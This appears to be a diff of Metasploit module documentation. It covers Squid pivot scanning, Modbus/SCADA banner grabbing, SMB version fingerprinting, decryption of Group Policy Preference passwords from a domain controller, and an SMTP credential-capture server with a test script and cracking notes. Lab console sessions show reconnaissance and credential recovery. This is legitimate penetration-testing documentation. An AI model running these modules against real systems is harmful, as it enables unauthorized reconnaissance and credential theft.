+[*] [10.10.10.100] Requesting 192.168.0.1:1723
+[*] [10.10.10.100] 192.168.0.1 is alive but 1723 is closed.
+[*] [10.10.10.100] Requesting 192.168.0.1:3389
+[*] [10.10.10.100] 192.168.0.1 is alive but 3389 is closed.
+[*] [10.10.10.100] Requesting 192.168.0.1:8080
+[*] [10.10.10.100] 192.168.0.1 is alive but 8080 is closed.
+[*] [10.10.10.100] Requesting 192.168.0.1:9100
+[*] [10.10.10.100] 192.168.0.1 is alive but 9100 is closed.
+[*] [10.10.10.100] Requesting 192.168.0.2:21
+[+] [10.10.10.100] 192.168.0.2 is alive.
+[*] [10.10.10.100] 192.168.0.2 is alive but 21 is closed.
+[*] [10.10.10.100] Requesting 192.168.0.2:22
+[*] [10.10.10.100] 192.168.0.2:22 likely blocked by ACL.
+[*] [10.10.10.100] Requesting 192.168.0.2:23
+[*] [10.10.10.100] 192.168.0.2:23 likely blocked by ACL.
+[*] [10.10.10.100] Requesting 192.168.0.2:24
+[*] [10.10.10.100] 192.168.0.2:24 likely blocked by ACL.
+[*] [10.10.10.100] Requesting 192.168.0.2:25
+[*] [10.10.10.100] 192.168.0.2:25 likely blocked by ACL.
+[*] [10.10.10.100] Requesting 192.168.0.2:79
+[*] [10.10.10.100] 192.168.0.2:79 likely blocked by ACL.
+[*] [10.10.10.100] Requesting 192.168.0.2:80
+[+] [10.10.10.100] 192.168.0.2:80 seems open (HTTP 302 redirect to: 'index.php', server header: 'nginx/1.14.0 (Ubuntu)')
+[*] [10.10.10.100] Requesting 192.168.0.2:81
+[*] [10.10.10.100] 192.168.0.2:81 likely blocked by ACL.
+[*] [10.10.10.100] Requesting 192.168.0.2:139
+[*] [10.10.10.100] 192.168.0.2:139 likely blocked by ACL.
+[*] [10.10.10.100] Requesting 192.168.0.2:443
+[*] [10.10.10.100] 192.168.0.2 is alive but 443 is closed.
+[*] [10.10.10.100] Requesting 192.168.0.2:445
+[*] [10.10.10.100] 192.168.0.2:445 likely blocked by ACL.
+[*] [10.10.10.100] Requesting 192.168.0.2:1433
+[*] [10.10.10.100] 192.168.0.2 is alive but 1433 is closed.
+[*] [10.10.10.100] Requesting 192.168.0.2:1521
+[*] [10.10.10.100] 192.168.0.2 is alive but 1521 is closed.
+[*] [10.10.10.100] Requesting 192.168.0.2:1723
+[*] [10.10.10.100] 192.168.0.2 is alive but 1723 is closed.
+[*] [10.10.10.100] Requesting 192.168.0.2:3389
+[*] [10.10.10.100] 192.168.0.2 is alive but 3389 is closed.
+[*] [10.10.10.100] Requesting 192.168.0.2:8080
+[*] [10.10.10.100] 192.168.0.2 is alive but 8080 is closed.
+[*] [10.10.10.100] Requesting 192.168.0.2:9100
+[*] [10.10.10.100] 192.168.0.2 is alive but 9100 is closed.
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+If the Squid administrator has made the error of having an ACL be too permissive, you might even see more interesting ports. A contrived example is below, note SSH has been added to `Safe_ports`.
+
+```
+acl Safe_ports port 80          # http
+acl Safe_ports port 443         # https
+acl Safe_ports port 21          # ftp
+acl Safe_ports port 22          # ssh
+
+http_access deny !Safe_ports
+http_access allow localhost
+http_access allow localnet
+http_access deny all
+```
+
+```
+msf6 auxiliary(scanner/http/squid_pivot_scanning) > set TARGETS 127.0.0.1
+TARGETS => 127.0.0.1
+msf6 auxiliary(scanner/http/squid_pivot_scanning) > set RANGE 127.0.0.1
+RANGE => 127.0.0.1
+msf6 auxiliary(scanner/http/squid_pivot_scanning) > set PORTS 21-23
+PORTS => 21-23
+msf6 auxiliary(scanner/http/squid_pivot_scanning) > run
+
+[*] [10.10.10.100] Verifying manual testing is not required...
+[*] [10.10.10.100] Requesting 127.0.0.1:21
+[+] [10.10.10.100] 127.0.0.1 is alive.
+[*] [10.10.10.100] 127.0.0.1 is alive but 21 is closed.
+[*] [10.10.10.100] Requesting 127.0.0.1:22
+[+] [10.10.10.100] 127.0.0.1:22 seems open (HTTP 200, server header: 'unknown').
+[*] [10.10.10.100] Requesting 127.0.0.1:23
+[*] [10.10.10.100] 127.0.0.1:23 likely blocked by ACL.
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+
+Finally, it is worth knowing that all open discovered ports are saved as services for later viewing:
+
+```
+msf6 auxiliary(scanner/http/squid_pivot_scanning) > services
+Services
+========
+
+host          port  proto  name                   state  info
+----          ----  -----  ----                   -----  ----
+127.0.0.1     22    tcp    unknown                open   SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2
+Protocol mismatch.
+192.168.0.1  80    tcp    nginx/1.14.0 (ubuntu)  open   <html><head>...
+192.168.0.2  80    tcp    nginx/1.14.0 (ubuntu)  open   Redirect to: index.php
+```
@@ -0,0 +1,98 @@
+## Vulnerable Application
+
+This module will perform banner grabbing on devices that use the Modbus protocol by sending
+a payload with the function code 43 to read the target device's identification information.
+For more technical information, you can refer to this link: https://en.wikipedia.org/wiki/Modbus#Available_function/command_codes.
+
+By default the service is running on port 502, so any device with this port open could be a potential target.
+
+## Verification Steps
+  1. Do: `use auxiliary/scanner/scada/modbus_banner_grabbing`
+  2. Do: `set RHOST <IP>` where IP is the IP address of the target.
+  3. Do: `run`
+
+The response from the target device may contain several objects. Some of these objects can be seen below:
+
+`vendor name, product code, revision number (in *major version*.*minor version* format), vendor url, product name, model name`
+
+If the target was unable to process the Modbus message, a Modbus exception message will be returned from the target,
+ which will then be output to the screen.
+
+Successful results from the scan will be stored as a `note` in the framework. You can access these notes by typing `note` in the console.
+
+```
+msf5 auxiliary(scanner/scada/modbus_banner_grabbing) > notes
+
+Notes
+=====
+
+ Time                     Host            Service  Port  Protocol  Type                Data
+ ----                     ----            -------  ----  --------  ----                ----
+ 2020-07-06 13:25:50 UTC  192.168.1.1     modbus   502   tcp       modbus.vendorname   "Schneider Electric"
+ 2020-07-06 13:25:50 UTC  192.168.1.1     modbus   502   tcp       modbus.productcode  "BMX NOE 0100"
+ 2020-07-06 13:25:50 UTC  192.168.1.1     modbus   502   tcp       modbus.revision     "V3.10"
+```
+
+## Options
+There are no non-default options for this module.
+
+## Scenarios
+The following scenarios describe some of the responses you may receive from the target:
+
+### Schneider Electric BMX NOE 0100 - Successful Response
+
+```
+msf6 > use auxiliary/scanner/scada/modbus_banner_grabbing
+msf6 auxiliary(scanner/scada/modbus_banner_grabbing) > set RHOSTS 192.168.1.1
+RHOSTS => 192.168.1.1
+msf6 auxiliary(scanner/scada/modbus_banner_grabbing) > run
+
+[*] 192.168.1.1:502    - Number of Objects: 3
+[+] 192.168.1.1:502    - VendorName: Schneider Electric
+[+] 192.168.1.1:502    - ProductCode: BMX NOE 0100
+[+] 192.168.1.1:502    - Revision: V3.10
+[*] 192.168.1.1:502    - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+### Schneider Electric BMX NOE 0100 - No Reply
+The target never replied to the attacker's request.
+
+```
+msf6 > use auxiliary/scanner/scada/modbus_banner_grabbing
+msf6 auxiliary(scanner/scada/modbus_banner_grabbing) > set RHOSTS 192.168.1.2
+RHOSTS => 192.168.1.2
+msf6 auxiliary(scanner/scada/modbus_banner_grabbing) > run
+
+[-] 192.168.1.2:502      - MODBUS - No reply
+[*] 192.168.1.2:502      - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+### Schneider Electric BMX NOE 0100 - Network Error
+Some network error occurred, such as a connection error, a network timeout, or the connection was refused.
+Alternatively, the host may be unreachable.
+
+```
+msf6 > use auxiliary/scanner/scada/modbus_banner_grabbing
+msf6 auxiliary(scanner/scada/modbus_banner_grabbing) > set RHOSTS 192.168.1.3
+RHOSTS => 192.168.1.3
+msf6 auxiliary(scanner/scada/modbus_banner_grabbing) > run
+
+[-] 192.168.1.3:502     - MODBUS - Network error during payload: The connection timed out (217.71.253.52:502).
+[*] 192.168.1.3:502     - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+### Schneider Electric BMX NOE 0100 - Modbus Exception Code (i.e. Memory Parity Error)
+
+```
+msf6 > use auxiliary/scanner/scada/modbus_banner_grabbing
+msf6 auxiliary(scanner/scada/modbus_banner_grabbing) > set RHOSTS 192.168.1.4
+RHOSTS => 192.168.1.4
+msf6 auxiliary(scanner/scada/modbus_banner_grabbing) > run
+
+[-] 192.168.1.4:502      - Memory Parity Error: Slave detected a parity error in memory.
+[*] 192.168.1.4:502      - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,77 @@
+## Vulnerable Application
+
+This module enumerates files from target domain controllers and connects to them via SMB. It then looks for Group Policy
+Preference XML files containing local/domain user accounts and passwords and decrypts them using Microsoft's public AES
+key. This module has been tested successfully on a Win2k8 R2 Domain Controller.
+
+### Test Environment
+
+This vulnerability was patched in 2014 but Group Policy Prefence files can still be found in modern environments. Because of that it is
+necessary to have a means to test this vulnerability in a contrived way.
+
+Starting from a Windows Server that has been configured as an Active Directory Domain Controller:
+1. Navigate to: `%SystemRoot%\SYSVOL\sysvol\$domain\Policies` where `$domain` is the name of the domain.
+1. Create a subfolder. These folders typically use UUIDs within braces (e.g. `{31B2F340-016D-11D2-945F-00C04FB984F9}`) but the name does not
+   matter for testing purposes.
+1. In the new a new file (and the necessary parent folders) `MACHINE\Preferences\Groups\Groups.xml`.
+1. Place the contents below in the new `Groups.xml` file.
+
+```
+<?xml version="1.0" encoding="utf-8"?>
+<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
+	<User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="SuperSecretBackdoor" image="0" changed="2013-04-25 18:36:07" uid="{B5EDB865-34F5-4BD7-9C59-3AEB1C7A68C3}">
+		<Properties action="C" fullName="" description="" cpassword="VBQUNbDhuVti3/GHTGHPvcno2vH3y8e8m1qALVO1H3T0rdkr2rub1smfTtqRBRI3" changeLogon="0" noChange="0" neverExpires="1" acctDisabled="0" userName="SuperSecretBackdoor"/>
+	</User>
+</Groups>
+```
+
+This example XML data was taken from the unit test.
+
+## Verification Steps
+Example steps in this format (is also in the PR):
+
+1. Start msfconsole
+1. Do: `use auxiliary/scanner/smb/smb_enum_gpp`
+1. Do: `set RHOSTS ...`
+1. Do: `set SMBUser ...`
+1. Do: `set SMBPass ...`
+1. Do: `run`
+
+### Windows Server 2019 (Test Setup)
+
+The following example use the contrived setup from the "Test Environment" section.
+
+```
+msf6 auxiliary(scanner/smb/smb_enum_gpp) > use auxiliary/scanner/smb/smb_enum_gpp 
+msf6 auxiliary(scanner/smb/smb_enum_gpp) > set RHOSTS 192.168.159.10
+RHOSTS => 192.168.159.10
+msf6 auxiliary(scanner/smb/smb_enum_gpp) > set SMBUSER smcintyre
+SMBUSER => smcintyre
+msf6 auxiliary(scanner/smb/smb_enum_gpp) > set SMBPass Password1
+SMBPass => Password1
+msf6 auxiliary(scanner/smb/smb_enum_gpp) > run
+
+[*] 192.168.159.10:445    - Connecting to the server...
+[*] 192.168.159.10:445    - Mounting the remote share \\192.168.159.10\SYSVOL'...
+[+] 192.168.159.10:445    - Found Policy Share on 192.168.159.10
+[*] 192.168.159.10:445    - Parsing file: \\192.168.159.10\SYSVOL\msflab.local\Policies\fake\MACHINE\Preferences\Groups\Groups.xml
+[+] 192.168.159.10:445    - Group Policy Credential Info
+============================
+
+ Name               Value
+ ----               -----
+ TYPE               Groups.xml
+ USERNAME           SuperSecretBackdoor
+ PASSWORD           Super!!!Password
+ DOMAIN CONTROLLER  192.168.159.10
+ DOMAIN             msflab.local
+ CHANGED            2013-04-25 18:36:07
+ NEVER_EXPIRES?     1
+ DISABLED           0
+
+[+] 192.168.159.10:445    - XML file saved to: /home/smcintyre/.msf4/loot/20200828163158_default_192.168.159.10_microsoft.window_053830.txt
+[+] 192.168.159.10:445    - Groups.xml saved as: /home/smcintyre/.msf4/loot/20200828163158_default_192.168.159.10_smb.shares.file_279441.xml
+[*] 192.168.159.10:445    - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/smb/smb_enum_gpp) >
+```
@@ -1,167 +1,78 @@
-The `smb_version` module is used to determine what version of the Operating System is installed.
-This module also attempts to determine the following information on the system if possible:
+The `smb_version` module is used to determine information about a remote SMB server. It will fingerprint protocol
+version and capability information. If the target server supports SMB version 1, then the module will also attempt to
+identify the information about the host operating system.
+
+### Protocol Information
+
+1. Protocol Versions: The list of SMB protocol versions that the server supports.
+1. Preferred Dialect: The preferred dialect for the newest protocol version that the server supports.
+1. Signature Requirements: Whether or not the server requires security signatures.
+1. Uptime: How long the server has been up, as calculated by subtracting the current time from the system time. This 
+   calculation requires that both fields be provided by the server. If one or both fields are unset, this value will be
+   omitted.
+    * Requires versions: 2+
+1. Server GUID: The unique identifier of the server. This value can be used to identify systems with multiple network 
+   interfaces.
+    * Requires versions: 2+
+1. Capabilities: The supported encryption and compression algorithms that the server supports.
+    * Requires versions: 3+
+1. Authentication Domain: The domain that the server prompts the user to authenticate to when attempting to login.
+
+### Host Operating System Information
+
+*This information is only available if the target SMB server supports SMB version 1.*

 1. OS (product and version)
-2. lanman version
-3. OS build number
-4. Service pack
-5. OS language
-
-## Vulnerable Application
-
-To use `smb_version`, make sure you are able to connect to a SMB service that supports SMBv1.
+1. LAN Manager version
+1. OS build number
+1. Service pack
+1. OS language

 ## Verification Steps

-1. Do: ```use auxiliary/scanner/smb/smb_version``` 
-2. Do: ```set rhosts [IP]```
-3. Do: ```run```
+1. Do: `use auxiliary/scanner/smb/smb_version`
+2. Do: `set rhosts [IP]`
+3. Do: `run`

 ## Scenarios

 This is an example run of a network with several different version of Windows, metasploit 1 and 2, and a NAS device running SAMBA.

 ```
-msf > use auxiliary/scanner/smb/smb_version 
-msf auxiliary(smb_version) > set rhosts 10.9.7.1-254
-rhosts => 10.9.7.1-254
-msf auxiliary(smb_version) > set threads 5
-threads => 5
-msf auxiliary(smb_version) > run
+msf5 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.159.0/24
+RHOSTS => 192.168.159.0/24
+msf5 auxiliary(scanner/smb/smb_version) > show options 

-[*] 10.9.7.7:445       - Host is running Windows 2008 R2 Standard (build:7600) (name:WIN-O712LQK2K69) (workgroup:WORKGROUP )
-[*] Scanned  26 of 254 hosts (10% complete)
-[*] 10.9.7.35:445      - Host could not be identified: Unix (Samba 3.0.20-Debian)
-[*] 10.9.7.46:445      - Host could not be identified: Unix (Samba 3.0.20-Debian)
-[*] Scanned  52 of 254 hosts (20% complete)
-[*] Scanned  77 of 254 hosts (30% complete)
-[*] 10.9.7.91:445      - Host is running Windows 8.1 Enterprise Evaluation (build:9600) (name:IE11WIN8_1) (workgroup:WORKGROUP )
-[*] Scanned 105 of 254 hosts (41% complete)
-[*] 10.9.7.108:445     - Host is running Windows XP SP3 (language:English) (name:WINXP) (workgroup:WORKGROUP )
-[*] 10.9.7.119:445     - Host could not be identified: Windows 6.1 (Samba 4.4.9)
-[*] 10.9.7.127:445     - Host is running Windows 2000 SP4 with ms05-010+ (language:English) (name:WIN2K) (workgroup:WORKGROUP )
-[*] Scanned 127 of 254 hosts (50% complete)
-[*] Scanned 154 of 254 hosts (60% complete)
-[*] 10.9.7.164:445     - Host is running Windows 2012 Standard (build:9200) (name:WIN-OBKF2JFCDKL)
-[*] 10.9.7.175:445     - Host is running Windows 10 Pro (build:14393) (name:WORKDESK)
-[*] Scanned 178 of 254 hosts (70% complete)
-[*] Scanned 204 of 254 hosts (80% complete)
-[*] Scanned 231 of 254 hosts (90% complete)
-[*] 10.9.7.232:445     - Host is running Windows 7 Enterprise SP1 (build:7601) (name:IE11WIN7) (workgroup:WORKGROUP )
-[*] Scanned 254 of 254 hosts (100% complete)
+Module options (auxiliary/scanner/smb/smb_version):
+
+   Name     Current Setting   Required  Description
+   ----     ---------------   --------  -----------
+   RHOSTS   192.168.159.0/24  yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   THREADS  15                yes       The number of concurrent threads (max one per host)
+
+msf5 auxiliary(scanner/smb/smb_version) > run
+
+[*] 192.168.159.10:445    - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:required) (guid:{faf5534c-d125-4081-aa2a-cf3256415908}) (authentication domain:MSFLAB)
+[*] 192.168.159.10:445    -   Host could not be identified: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
+[*] 192.168.159.30:445    - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (guid:{8f1ce8b7-e198-404e-89d6-a27297b1c3f2}) (authentication domain:DESKTOP-RTCRBEV)
+[*] 192.168.159.0/24:     - Scanned  30 of 256 hosts (11% complete)
+[*] 192.168.159.38:445    - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.0.2) (signatures:optional) (uptime:4d 17h 33m 34s) (guid:{cd5d41db-0bb8-4954-9421-0cdd14b7c6f7}) (authentication domain:WIN-46IL3RC2FHI)
+[*] 192.168.159.31:445    - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (uptime:3m 6s) (guid:{caaee1a3-8f74-4dd0-b0eb-436d7abc8979}) (authentication domain:WIN-9NSI4A6AIHJ)
+[+] 192.168.159.31:445    -   Host is running Windows 7 Professional SP1 (build:7601) (name:WIN-9NSI4A6AIHJ) (workgroup:WORKGROUP)
+[*] 192.168.159.48:445    - SMB Detected (versions:1) (preferred dialect:) (signatures:optional)
+[+] 192.168.159.48:445    -   Host is running Windows XP SP2 (language:English) (name:SMCINTYR-81CC7C) (workgroup:WORKGROUP)
+[*] 192.168.159.0/24:     - Scanned  57 of 256 hosts (22% complete)
+[*] 192.168.159.0/24:     - Scanned  87 of 256 hosts (33% complete)
+[*] 192.168.159.0/24:     - Scanned 104 of 256 hosts (40% complete)
+[*] 192.168.159.128:445   - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZ77) (encryption capabilities:AES-128-GCM) (signatures:optional) (guid:{61636f6c-686c-736f-7400-000000000000}) (authentication domain:LOCALHOST)
+[*] 192.168.159.129:445   - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (guid:{19147a6c-08c1-4e9c-b6c5-1119e2c57e6a}) (authentication domain:DESKTOP-R9TM84E)
+[+] 192.168.159.129:445   -   Host is running Windows 10 Enterprise (build:17763) (name:DESKTOP-R9TM84E) (workgroup:WORKGROUP)
+[*] 192.168.159.0/24:     - Scanned 137 of 256 hosts (53% complete)
+[*] 192.168.159.0/24:     - Scanned 163 of 256 hosts (63% complete)
+[*] 192.168.159.0/24:     - Scanned 180 of 256 hosts (70% complete)
+[*] 192.168.159.0/24:     - Scanned 205 of 256 hosts (80% complete)
+[*] 192.168.159.0/24:     - Scanned 234 of 256 hosts (91% complete)
+[*] 192.168.159.0/24:     - Scanned 256 of 256 hosts (100% complete)
 [*] Auxiliary module execution completed
+msf5 auxiliary(scanner/smb/smb_version) > 
 ```
-
-## Confirmation with nmap
-
-There are several scripts that attempt to validate OS information through SMB.  The most equivalent is [smb-os-discovery](https://nmap.org/nsedoc/scripts/smb-os-discovery.html).
-
-```
-nmap --script smb-os-discovery.nse -p445 10.9.7.7,35,91,108,119,127,164,175,232
-
-Starting Nmap 7.40 ( https://nmap.org ) at 2017-05-19 14:12 EDT
-Nmap scan report for WIN-O712LQK2K69 (10.9.7.7)
-Host is up (0.0025s latency).
-PORT    STATE SERVICE
-445/tcp open  microsoft-ds
-MAC Address: 00:0C:29:28:DD:A0 (VMware)
-
-Host script results:
-| smb-os-discovery: 
-|   OS: Windows Server 2008 R2 Standard 7600 (Windows Server 2008 R2 Standard 6.1)
-|   OS CPE: cpe:/o:microsoft:windows_server_2008::-
-|   Computer name: WIN-O712LQK2K69
-|   NetBIOS computer name: WIN-O712LQK2K69\x00
-|   Workgroup: WORKGROUP\x00
-|_  System time: 2017-05-19T11:12:15-07:00
-
-Nmap scan report for 10.9.7.35
-Host is up (0.0018s latency).
-PORT    STATE SERVICE
-445/tcp open  microsoft-ds
-MAC Address: 00:0C:29:59:D4:F7 (VMware)
-
-Host script results:
-| smb-os-discovery: 
-|   OS: Unix (Samba 3.0.20-Debian)
-|   NetBIOS computer name: 
-|   Workgroup: WORKGROUP\x00
-|_  System time: 2017-05-19T14:33:31-04:00
-
-Nmap scan report for IE11Win8_1 (10.9.7.91)
-Host is up (0.0020s latency).
-PORT    STATE SERVICE
-445/tcp open  microsoft-ds
-MAC Address: 00:0C:29:E0:CF:FB (VMware)
-
-Host script results:
-| smb-os-discovery: 
-|   OS: Windows 8.1 Enterprise Evaluation 9600 (Windows 8.1 Enterprise Evaluation 6.3)
-|   OS CPE: cpe:/o:microsoft:windows_8.1::-
-|   NetBIOS computer name: IE11WIN8_1\x00
-|   Workgroup: WORKGROUP\x00
-|_  System time: 2017-05-19T11:04:48-07:00
-
-Nmap scan report for winxp (10.9.7.108)
-Host is up (0.0018s latency).
-PORT    STATE SERVICE
-445/tcp open  microsoft-ds
-MAC Address: 00:0C:29:D6:24:67 (VMware)
-
-Host script results:
-| smb-os-discovery: 
-|   OS: Windows XP (Windows 2000 LAN Manager)
-|   OS CPE: cpe:/o:microsoft:windows_xp::-
-|   Computer name: winxp
-|   NetBIOS computer name: WINXP\x00
-|   Workgroup: RAGEGROUP\x00
-|_  System time: 2017-05-19T14:12:29-04:00
-
-Nmap scan report for workNAS (10.9.7.119)
-Host is up (0.0024s latency).
-PORT    STATE SERVICE
-445/tcp open  microsoft-ds
-MAC Address: 00:11:32:10:FE:C4 (Synology Incorporated)
-
-Host script results:
-| smb-os-discovery: 
-|   OS: Windows 6.1 (Samba 4.4.9)
-|   Computer name: worknas
-|   NetBIOS computer name: WORKNAS\x00
-|   Domain name: \x00
-|   FQDN: worknas
-|_  System time: 2017-05-19T14:12:41-04:00
-
-Nmap scan report for win2k (10.9.7.127)
-Host is up (0.0025s latency).
-PORT    STATE SERVICE
-445/tcp open  microsoft-ds
-MAC Address: 00:0C:29:C8:97:2D (VMware)
-
-Host script results:
-| smb-os-discovery: 
-|   OS: Windows 2000 (Windows 2000 LAN Manager)
-|   OS CPE: cpe:/o:microsoft:windows_2000::-
-|   Computer name: win2k
-|   NetBIOS computer name: WIN2K\x00
-|   Workgroup: WORKGROUP\x00
-|_  System time: 2017-05-19T14:04:37-04:00
-
-Nmap scan report for IE11Win7 (10.9.7.232)
-Host is up (0.0019s latency).
-PORT    STATE SERVICE
-445/tcp open  microsoft-ds
-MAC Address: 00:0C:29:7D:29:4C (VMware)
-
-Host script results:
-| smb-os-discovery: 
-|   OS: Windows 7 Enterprise 7601 Service Pack 1 (Windows 7 Enterprise 6.1)
-|   OS CPE: cpe:/o:microsoft:windows_7::sp1
-|   Computer name: IE11Win7
-|   NetBIOS computer name: IE11WIN7\x00
-|   Workgroup: WORKGROUP\x00
-|_  System time: 2017-05-19T11:04:46-07:00
-
-Nmap done: 8 IP addresses (7 hosts up) scanned in 4.67 seconds
-
-```
@@ -0,0 +1,196 @@
+## Vulnerable Application
+
+This module creates a mock SMTP server which accepts credentials or unauthenticated email
+before throwing a `503` error.
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Do: ```use auxiliary/server/capture/smtp```
+  3. Do: ```run```
+
+## Options
+
+## Scenarios
+
+### Testing Script
+
+The following script should test the following:
+
+1. Auth Plain
+2. Auth Login
+3. Auth CRAM-MD5
+4. Sending an email w/o auth
+5. RSET is implemented (https://github.com/rapid7/metasploit-framework/issues/11980)
+
+    ```
+    require 'net/smtp'
+    require 'socket'
+
+    puts 'Testing: plain'
+    begin
+      Net::SMTP.start('127.0.0.1', 25, 'localhost', 'username_plain', 'password_plain', :plain)
+    rescue => e
+      puts "Error: #{e}"
+    end
+    
+    puts 'Testing: login'
+    begin
+      Net::SMTP.start('127.0.0.1', 25, 'localhost', 'username_login', 'password_login', :login)
+    rescue => e
+      puts "Error: #{e}"
+    end
+    
+    puts 'Testing: cram md5'
+    begin
+      Net::SMTP.start('127.0.0.1', 25, 'localhost', 'username_cram', 'password_cram', :cram_md5)
+    rescue => e
+      puts "Error: #{e}"
+    end
+    
+    puts 'Testing: DATA'
+    begin
+      Net::SMTP.start('127.0.0.1') do |smtp|
+        smtp.send_message 'test', 'from@test.com', 'to@test.com'
+      end
+    rescue => e
+      puts "Error: #{e}"
+    end
+    
+    
+    # test for https://github.com/rapid7/metasploit-framework/issues/11980
+    puts 'Testing: RSET during DATA'
+    begin
+      t = TCPSocket.open('127.0.0.1', 25)
+      t.gets
+      t.print("EHLO localhost \r\n")
+      t.gets
+      t.print("MAIL FROM:<from@test.com>\r\n")
+      t.gets
+      t.print("MAIL TO:<to@test.com>\r\n")
+      t.gets
+      t.print("DATA\r\n")
+      t.gets
+      t.print("RSET\r\n")
+      puts "  Response: #{t.gets.chop}"
+    rescue => e
+      puts "Error: #{e}"
+    end
+
+    puts 'Testing: RSET during middle of DATA'
+    begin
+      t = TCPSocket.open('127.0.0.1', 25)
+      t.gets
+      t.print("EHLO localhost \r\n")
+      t.gets
+      t.print("MAIL FROM:<from@test.com>\r\n")
+      t.gets
+      t.print("MAIL TO:<to@test.com>\r\n")
+      t.gets
+      t.print("DATA\r\n")
+      t.gets
+      t.print("testing a message which gets cancelled\r\n")
+      t.print("RSET\r\n")
+      puts "  Response: #{t.gets.chop}"
+    rescue => e
+      puts "Error: #{e}"
+    end
+    ```
+
+### Output from testing script
+
+When this script is run from the Metasploit console, it intermingles with the commands, which is great!
+
+```
+$ sudo ./msfconsole -qx 'use auxiliary/server/capture/smtp; set srvhost 127.0.0.1;run;ruby tools/dev/test_capture_smtp.rb'
+srvhost => 127.0.0.1
+[*] Auxiliary module running as background job 0.
+[*] exec: ruby tools/dev/test_capture_smtp.rb
+
+[*] Started service listener on 127.0.0.1:25 
+[*] Server started.
+Testing: plain
+[*] SMTP: 127.0.0.1:46212 Command: EHLO localhost
+[*] SMTP: 127.0.0.1:46212 Command: AUTH PLAIN AHVzZXJuYW1lX3BsYWluAHBhc3N3b3JkX3BsYWlu
+[+] SMTP LOGIN 127.0.0.1:46212 username_plain / password_plain
+Testing: login
+[*] SMTP: 127.0.0.1:46214 Command: EHLO localhost
+[*] SMTP: 127.0.0.1:46214 Command: AUTH LOGIN
+[*] SMTP: 127.0.0.1:46214 Command: dXNlcm5hbWVfbG9naW4=
+[*] SMTP: 127.0.0.1:46214 Command: cGFzc3dvcmRfbG9naW4=
+[+] SMTP LOGIN 127.0.0.1:46214 username_login / password_login
+Testing: cram md5
+[*] SMTP: 127.0.0.1:46216 Command: EHLO localhost
+[*] SMTP: 127.0.0.1:46216 Command: AUTH CRAM-MD5
+[*] SMTP: 127.0.0.1:46216 Command: dXNlcm5hbWVfY3JhbSA3YjA2NzUyMjVhM2FjMmI5MjMxYzJlOTM5OTg2Y2U0Mg==
+Testing: DATA
+[+] SMTP LOGIN 127.0.0.1:46216 username_cram / <12345@127.0.0.1>#7b0675225a3ac2b9231c2e939986ce42
+[*] SMTP: 127.0.0.1:46218 Command: EHLO localhost
+[*] SMTP: 127.0.0.1:46218 Command: MAIL FROM:<from@test.com>
+[*] SMTP: 127.0.0.1:46218 Command: RCPT TO:<to@test.com>
+[*] SMTP: 127.0.0.1:46218 Command: DATA
+[*] SMTP: 127.0.0.1:46218 Command: test
+.
+[*] SMTP: 127.0.0.1:46218 EMAIL: test
+[*] SMTP: 127.0.0.1:46218 Command: QUIT
+Testing: RSET during DATA
+[*] SMTP: 127.0.0.1:46220 Command: EHLO localhost
+[*] SMTP: 127.0.0.1:46220 Command: MAIL FROM:<from@test.com>
+[*] SMTP: 127.0.0.1:46220 Command: MAIL TO:<to@test.com>
+[*] SMTP: 127.0.0.1:46220 Command: DATA
+[*] SMTP: 127.0.0.1:46220 Command: RSET
+  Response: 250 OK
+Testing: RSET during middle of DATA
+[*] SMTP: 127.0.0.1:46222 Command: EHLO localhost
+[*] SMTP: 127.0.0.1:46222 Command: MAIL FROM:<from@test.com>
+[*] SMTP: 127.0.0.1:46222 Command: MAIL TO:<to@test.com>
+[*] SMTP: 127.0.0.1:46222 Command: DATA
+[*] SMTP: 127.0.0.1:46222 Command: testing a message which gets cancelled
+RSET
+[*] SMTP: 127.0.0.1:46222 EMAIL: testing a message which gets cancelled
+  Response: 250 OK
+msf5 auxiliary(server/capture/smtp) > creds
+Credentials
+===========
+
+host       origin     service        public          private                                             realm  private_type        JtR Format
+----       ------     -------        ------          -------                                             -----  ------------        ----------
+127.0.0.1  127.0.0.1  25/tcp (smtp)  username_cram   <12345@127.0.0.1>#7b0675225a3ac2b9231c2e939986ce42         Nonreplayable hash  hmac-md5
+127.0.0.1  127.0.0.1  25/tcp (smtp)  username_login  password_login                                             Password            
+127.0.0.1  127.0.0.1  25/tcp (smtp)  username_plain  password_plain                                             Password            
+
+msf5 auxiliary(server/capture/smtp) > notes
+
+Notes
+=====
+
+ Time                     Host       Service  Port  Protocol  Type          Data
+ ----                     ----       -------  ----  --------  ----          ----
+ 2020-04-17 15:11:24 UTC  127.0.0.1                           smtp_message  "testing a message which gets cancelled\r\n"
+
+
+```
+
+### Cracking Cram-md5 (hmac-md5)
+
+Metasploit currently doesn't have a cracker for `hmac-md5`, however the output is pre-formatted to JTR standards,
+and `creds -o /tmp/file.jtr` will export it correctly for John.  It is also possible to export to hashcat format
+with `creds -o /tmp/file.hcat` and mode `10200`.
+
+```
